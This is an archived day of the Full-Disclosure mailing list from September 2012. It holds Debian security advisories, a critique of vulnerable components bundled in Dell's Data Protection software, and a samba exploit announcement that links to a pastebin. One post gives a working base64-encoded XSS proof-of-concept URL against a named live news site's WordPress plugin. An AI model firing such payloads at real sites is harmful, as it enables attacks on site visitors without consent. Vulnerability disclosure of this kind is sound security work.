[Full-disclosure] [SECURITY] [DSA 2553-1] iceweasel security update

2012-09-24 Thread Moritz Muehlenhoff

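-------------------------------------------------------------------------
Debian Security Advisory DSA-2553-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
September 24, 2012                     http://www.debian.org/security/faq
-------------------------------------------------------------------------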

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-1970 CVE-2012-1972 CVE-2012-1973 CVE-2012-1974 
 CVE-2012-1975 CVE-2012-1976 CVE-2012-3959 CVE-2012-3962 
 CVE-2012-3969 CVE-2012-3972 CVE-2012-3978

Several vulnerabilities have been discovered in Iceweasel, a web
browser based on Firefox. The included XULRunner library provides
rendering services for several other applications included in Debian.

The reported vulnerabilities could lead to the execution of arbitrary
code or the bypass of content-loading restrictions via the location
object.

For the stable distribution (squeeze), these problems have been fixed in
version 3.5.16-18.

For the testing distribution (wheezy), these problems have been fixed in
version 10.0.7esr-2.

For the unstable distribution (sid), these problems have been fixed in
version 10.0.7esr-2.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] giochionline.ilgiornale.it is vulnerable to base64 xss

2012-09-24 Thread tig3rhack
giochionline.ilgiornale.it is vulnerable to a base64 XSS attack; the PoC is below:

http://giochionline.ilgiornale.it/wp-content/plugins/special-recent-posts/lib/phpimage.php?file=dW5kZWZpbmVkMTxTY1JpUHQgPnByb21wdCg5MjExMTUpPC9TY1JpUHQ%2b&height=100&rotation=no&width=100

info:
http://tig3rblog.wordpress.com/2012/09/24/giochionline-ilgiornale-it-is-vulnerable-to-base64-xss/



[Full-disclosure] "Dell Data Protection | Access" for Windows contains and installs outdated, superfluous and vulnerable system components and 3rd party components/drivers

2012-09-24 Thread Stefan Kanthak
Hi @ll

the current version of Dell's Data Protection | Access (DDPA) software for
Windows (Build 2.2.3.008 from 2012-06-14, released August 2012) contains
and installs several outdated, superfluous and vulnerable Windows system
components as well as outdated and vulnerable 3rd party components and drivers.



From the readme.txt:

| Dell Data Protection | Access (DDP|A) is an integrated end point security
| management suite, providing for seamless data security and authentication.
| It allows you to authenticate using a fingerprint, smartcard, contactless
| smartcard or password. Pre-Windows can be configured to unlock self-encrypting
| drives upon authentication.


The outdated, superfluous and vulnerable components (incomplete):

#1. "Microsoft MSXML Parser.msi" version 6.0 from 2005-09-09

 All versions of Windows supported by DDP|A include a newer version
 of MSXML 6.0, the latest update/security fix cf.
 


#2. "Microsoft Root Certificate Update October 2010\rootsupd.exe"

The current Microsoft root certificate update is from April 2012,
cf. 


#3. "Microsoft Visual Studio Runtimes\vcredist_x86.exe"
 version 9.0.30729.17 from 2008-08-08

For the current Microsoft Visual C++ 2008 Redistributable Package
cf. 


#4. "Microsoft CCID Smartcard Reader for XP\usbccid.sys"
 version 5.2.3790.2444 from 2005-05-17

The installer package for DDP|A but includes the hotfix
"WindowsXP-KB967048-v2-x86-ENU.exe" with the current version of
this driver: 5.2.3790.4476, 2009-03-17


#5. "AuthenTec AES2810 Fingerprint Reader\AT8MinFoose.msi"
 version 8.4.4.39 from 2012-02-02

Cf. 



#6. "UPEK TouchChip Fingerprint Reader\UPEK_Touchchip.msi"
 version 5.9.4.6685 from 2010-09-15

Cf. 


This driver package contains parts of OpenSSL (no version specified),
it installs a textfile "OpenSSL license" from 2006-06-14!
So: add OpenSSL to the list of vulnerable components too.


#7. "UPEK TouchChip Fingerprint Reader PBA Support\spba.msi"
  version 5.9.4.6901 from 2010-??-??

This package contains a vulnerable MSVCRT+ 2005 runtime (version
8.0.50727.762)

Cf. 

This driver package contains parts of OpenSSL (no version specified),
it installs a textfile "OpenSSL license" from 2006-06-14!
So: add OpenSSL to the list of vulnerable components too.


#8. "Preboot Manager.msi" version 03.02.00.119 from 2011-12-06
  by Wave Systems Corp.

This package contains a vulnerable MSXML 4.0 SP2 (version 4.20.9818.0
from 2003-04-18).
Cf. 

This package contains a VTAPI.DLL (version 5.6.0.3239 from 2006-11-13)
from UPEK Inc. (see #6 and #7 above) which contains parts of OpenSSL.
So: yet another component with vulnerable OpenSSL code.

JFTR: no textfile with the "OpenSSL license" included here.


#9. "NTRU CryptoSystems TCG Software Stack\NTRU-CTSS-v1.2.1.37-eu.msi"
  version 1.2.1.37 from 2011-10-08
  by NTRU CryptoSystems Inc.

This package contains a vulnerable MSVCRT++ 2010 (version 10.0.30319.1
from 2010-03-18), cf.



... and more (I stopped counting)!


Dell Inc.: Don't you have any QA? Can't afford one?
UPEK Inc.: Don't you have any QA? Can't afford one?
Wave Corp.: Don't you have any QA? Can't afford one?
NTRU Inc.: Don't you have any QA? Can't afford one?

What about just a little bit of serious software engineering and due
diligence in your development, build and production processes?

It's a stupid idea to build security software from vulnerable components!


Stefan Kanthak


Timeline


2012-08-24    informed vendor support

2012-09-24    no reaction/reply from vendor support, report published



Re: [Full-disclosure] samba exploit - remote root colonel 0day

2012-09-24 Thread paul . szabo
Dear KD,

> Massive 0day hide all your printers.
> http://pastebin.com/AwpsBWVQ

That webpage says:
  ... targets = ... "samba_3.6.3-debian6" ...
(and older), and CVE-2012-1182 was fixed in 3.6.4 in April. Does this
issue affect current Samba 3.6.8?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



[Full-disclosure] [SECURITY] [DSA 2551-1] isc-dhcp security update

2012-09-24 Thread Nico Golde

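-------------------------------------------------------------------------
Debian Security Advisory DSA-2551-1                   secur...@debian.org
http://www.debian.org/security/                                Nico Golde
September 23, 2012                     http://www.debian.org/security/faq
-------------------------------------------------------------------------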

Package: isc-dhcp
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3955

Glen Eustace discovered that the ISC DHCP server, a server for automatic
IP address assignment, is not properly handling changes in the expiration
times of a lease.  An attacker may use this flaw to crash the service
and cause denial of service conditions, by reducing the expiration time
of an active IPv6 lease.

For the stable distribution (squeeze), this problem has been fixed in
version 4.1.1-P1-15+squeeze8.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 4.2.4-2.


We recommend that you upgrade your isc-dhcp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org




[Full-disclosure] samba exploit - remote root colonel 0day

2012-09-24 Thread kd

Massive 0day hide all your printers.

http://pastebin.com/AwpsBWVQ

# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'`